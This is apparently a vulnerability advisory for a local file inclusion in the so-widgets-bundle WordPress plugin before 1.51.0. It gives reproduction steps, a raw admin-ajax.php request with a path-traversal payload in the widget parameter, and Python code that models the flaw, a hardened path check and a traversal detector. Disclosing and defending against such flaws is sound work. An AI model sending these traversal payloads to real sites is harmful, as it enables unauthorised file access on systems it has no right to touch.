Source: wpexploit | Author: Sebastian Neef | WPEX-ID: ADC9ED9F-55B4-43A9-A79D-C7120764F47C
History: Nov 27, 2023 - 12:00 a.m.

so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion

Tags: wordpress, docker-containers, network-admin, so-widgets-bundle, local file inclusion, security defense

AI Score: 8.7 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 19.5%)

Description: The plugin does not validate the user-supplied widget name before using it to build a path that is passed to a PHP include, so a user with the administrator role can include arbitrary local files (LFI). The issue is relevant on Multisite WordPress installations: there, a site administrator without super-admin (network-admin) rights normally cannot install, upload or edit plugin files, so the unchecked include lets that role load files outside what it is allowed to touch, whereas a single-site administrator can already edit plugin code directly.

1. Set up a multisite WordPress installation (e.g. in Docker containers) and create a second site with its own administrator account that has no super-admin/network-admin rights.
2. Install the so-widgets-bundle plugin and network-activate it.
3. Log in as that new administrator on the second site (here "site2", served at "/site2/").
4. Navigate to Plugins -> SiteOrigin Widgets.
5. Intercept the request sent when clicking "Activate" or "Deactivate" on any widget. It carries the nonce and looks like the following; the "widget" parameter is where the traversal sequence is injected:

POST /site2/wp-admin/admin-ajax.php?action=so_widgets_bundle_manage&_wpnonce=f29efd46d6 HTTP/1.1
Host: localhost
Content-Length: 127
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [cookie]
Connection: close

widget=../../../../../../../../../../../../../../../../../tmp/tmp&active=1
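As an added illustration (not code from the advisory or from the plugin itself), the Python below models the flaw and the two checks a practitioner would want around it. unsafe_widget_path reproduces the unvalidated path construction the description refers to, assuming a widgets/<slug>/<slug>.php layout and a WIDGETS_DIR that are both assumptions made for illustration; safe_widget_path shows the allowlist plus containment check that would close it; and flag_manage_request is detection logic that parses a captured admin-ajax.php request target and body and flags traversal in the widget parameter. The sample requests are constructed, the first mirroring the request shown above.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumed layout (not taken from the plugin): widgets/<slug>/<slug>.php under this directory.
WIDGETS_DIR = "/var/www/html/wp-content/plugins/so-widgets-bundle/widgets"
# Assumed allowlist for widget slugs: lowercase letters, digits, '-' and '_'.
SLUG_RE = re.compile(r"[a-z0-9][a-z0-9_-]*")
# A '..' segment anywhere in the (already percent-decoded) value.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")


def unsafe_widget_path(widget, base=WIDGETS_DIR):
    """Models the flaw: the attacker-controlled name is spliced into the include
    path with no validation, so '..' segments walk out of the widgets directory.
    posixpath is used so the result is deterministic and needs no filesystem."""
    return posixpath.normpath(posixpath.join(base, widget, widget + ".php"))


def safe_widget_path(widget, base=WIDGETS_DIR):
    """Hardened lookup: allowlist the slug, then confirm the normalised path is
    still inside base. Returns the path, or None when the name is rejected.
    This is a string-level check; a real deployment should also resolve
    symlinks (realpath) before comparing against the base directory."""
    if not SLUG_RE.fullmatch(widget):
        return None
    root = posixpath.normpath(base)
    path = posixpath.normpath(posixpath.join(root, widget, widget + ".php"))
    if not path.startswith(root + "/"):
        return None
    return path


def flag_manage_request(request_target, body):
    """Detection: given the request target (path + query) and the urlencoded
    body of an admin-ajax.php call, return a reason string if the widget
    parameter of a so_widgets_bundle_manage action contains a traversal
    sequence or an unexpected slug, else None."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    if parse_qs(parts.query).get("action") != ["so_widgets_bundle_manage"]:
        return None
    for widget in parse_qs(body).get("widget", []):  # parse_qs percent-decodes
        if TRAVERSAL_RE.search(widget) or widget.startswith("/") or "\\" in widget:
            return f"path traversal in widget={widget!r}"
        if not SLUG_RE.fullmatch(widget):
            return f"unexpected widget slug {widget!r}"
    return None


# Constructed samples: (request target, body). The first mirrors the advisory's
# request, the second is a benign toggle, the third is percent-encoded traversal.
SAMPLES = [
    ("/site2/wp-admin/admin-ajax.php?action=so_widgets_bundle_manage&_wpnonce=f29efd46d6",
     "widget=../../../../../../../../../../../../../../../../../tmp/tmp&active=1"),
    ("/site2/wp-admin/admin-ajax.php?action=so_widgets_bundle_manage&_wpnonce=f29efd46d6",
     "widget=button&active=1"),
    ("/site2/wp-admin/admin-ajax.php?action=so_widgets_bundle_manage&_wpnonce=f29efd46d6",
     "widget=..%2F..%2Fwp-config&active=0"),
]


def scan(samples=SAMPLES):
    """Run the detector over the sample requests; returns one result per sample."""
    return [flag_manage_request(target, body) for target, body in samples]


if __name__ == "__main__":
    payload = "../../../../../../../../../../../../../../../../../tmp/tmp"
    print("unsafe :", unsafe_widget_path(payload))   # resolves to /tmp/tmp.php
    print("safe   :", safe_widget_path(payload))     # None: rejected by the allowlist
    for result in scan():
        print("detect :", result)
```

The number of "../" segments in the advisory's payload is larger than the depth of any plausible plugin directory, which is why the unsafe path collapses to a file under /tmp regardless of where WordPress is installed; the hardened lookup rejects the name before any path arithmetic happens, and the containment check is a second line of defence should the allowlist ever be loosened.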
